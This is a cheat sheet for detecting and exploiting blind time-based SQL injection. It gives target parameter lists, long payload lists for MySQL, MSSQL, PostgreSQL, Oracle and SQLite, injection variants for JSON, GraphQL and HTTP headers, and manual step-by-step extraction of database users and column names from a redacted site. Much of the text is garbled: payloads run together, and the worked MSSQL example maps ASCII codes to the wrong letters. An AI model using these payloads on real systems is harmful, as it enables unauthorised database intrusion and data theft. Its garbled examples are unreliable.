Blind SQL Injection Detection and Exploitation (Cheat Sheet)

Time-based Blind SQLi : Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. epending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.

HUNT for Blind Sql Injection:

Time Based (GET,POST,PUT)

Apply on:

Search First name, last name, number, any kind of date, Email or Password (register, login, reset password) Any kind of Product,menu,keyword,payment Cookie,User agent,Referer,X-Forwarded-For

Parameter list (regular):

id
cid
pid
page
search
username
name
register
first name
last name
email
pass
password
dir
category
class
register
file
news
item
menu
lang
name
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter

Payload list:

MySQL Blind (Time Based):

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\"+(select(0)from(select(sleep(5)))v)+\"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#OR BLIND:or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#
')) or sleep(5)='
" or sleep(5)#
1) or sleep(5)#
)) or sleep(5)='
1)) or sleep(5)#
or sleep(5)#
%20'sleep%2050'
%20$(sleep%2050)
")) or sleep(5)="
or sleep(5)='
") or sleep(5)="
) or sleep(5)='
1 or sleep(5)#
You can replace AND / OR1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
ELT Blind:You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337

Microsoft SQL Server Blind (Time Based):

;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
1 waitfor delay '0:0:5'--
1' waitfor delay '0:0:5'--

Postgresql Blind (Time Based):

";SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
' SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
or pg_sleep(5)--
) or pg_sleep(5)--
)) or pg_sleep(5)--

Oracle Blind (Time Based):

You can replace AND / OR

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337

Generic Time Based SQL Injection Payloads:

sleep(5)#
(sleep 5)--
(sleep 5)
(sleep(5))--
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
";sleep 5--
";sleep 5
";sleep(5)--
";sleep(5)
";SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + '
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
;sleep 5--
;sleep 5
;sleep(5)--
;sleep(5)
;SELECT SLEEP(5); #
'&&SLEEP(5)&&'1
' SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

If response delay between 5 to 7 Seconds . It means vulnerable.

Detection and exploitation:

1.=payload

Example:

=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z=(select(0)from(select(sleep(5)))v)' WAITFOR DELAY '0:0:5'--'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z

2.=value payload

Example:

=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='=1'XOR(if(now()=sysdate(),sleep(5),0))OR'=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
    
=1 or sleep(5)#

Mysql blind sql injection (time based):

'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z

MSSQL blind Sql injection (time based):

' WAITFOR DELAY '0:0:5'--

3.https://redact.com/page/payload https://redact.com/page/value payload

Example:

"XOR(if(now()=sysdate(),sleep(3),0))OR"/" AnD SLEEP(5) ORDER BY SLEEP(5)

4.Blind Sql injection in json:

{payload}

[payload]

{value payload}

Example:

[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]{AnD SLEEP(5)}{1 AnD SLEEP(5)}{1' AnD SLEEP(5)--}{sleep 5}"emails":["AnD SLEEP(5)"]"emails":["test@gmail.com' OR SLEEP(5)#"]{"options":{"id":[],"emails":["AnD SLEEP(5)"],

5.Blind Sql injection in Graphql:

{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}

Example:

{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}

6.Http header based (Error based,Time Based):

Referer: https://https://redact.com/408685756payload

Cookie: _gcl_au=1.1.2127391584.1587087463paylaod

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload

Referer: https://https://redact.com/408685756 payload

Cookie: _gcl_au=1.1.2127391584.1587087463 paylaod

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload

X-Forwarded-For: paylaod

Mysql Error Based:

Mssql Error Based:

7.Blind Sql injection exploitation (Manual):

MySql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1-SLEEP(5)RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)Time Based Sqli:1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#Error Blind SQLi:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"Exploitation:
redact.com/page/search?q=1 and sleep(5)--Current user:redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--Table_name guessing:redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
Mssql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'RESULTING QUERY (VERIFY IF USER IS SA).SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'Exploitation:; WAITFOR DELAY '00:00:5'-- (+5 seconds)TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
; IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--
; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--
; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--
; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--
; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = 5 characters in lengthDetermine length, and then try to find out CHAR value one character position at a time, like this:
; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--
; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--
; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the first character CHAR value is 97 which is an "a"
; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the second character CHAR value is 50 which is a "d"
; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—
Result = third character CHAR value is 59 which is the letter "m"
; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fourth character CHAR value is 55 which is an "i"
; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)
the fifth character position has CHAR value of 15 which is the letter "n"Database User = 97,50,59,55,15 = adminTIME-BASED Extraction of 1st TABLE COLUMNS:
let’s enumerate some columns from the table(s) we found:; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)You can check the length before you start testing away
; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)
; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)Column Name = 117,115,51,114 = userPostgresql Blind SQLI(Stacked Queries):id=1; select pg_sleep(5);-- -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -

8.Blind Sql injection exploitation via sqlmap:

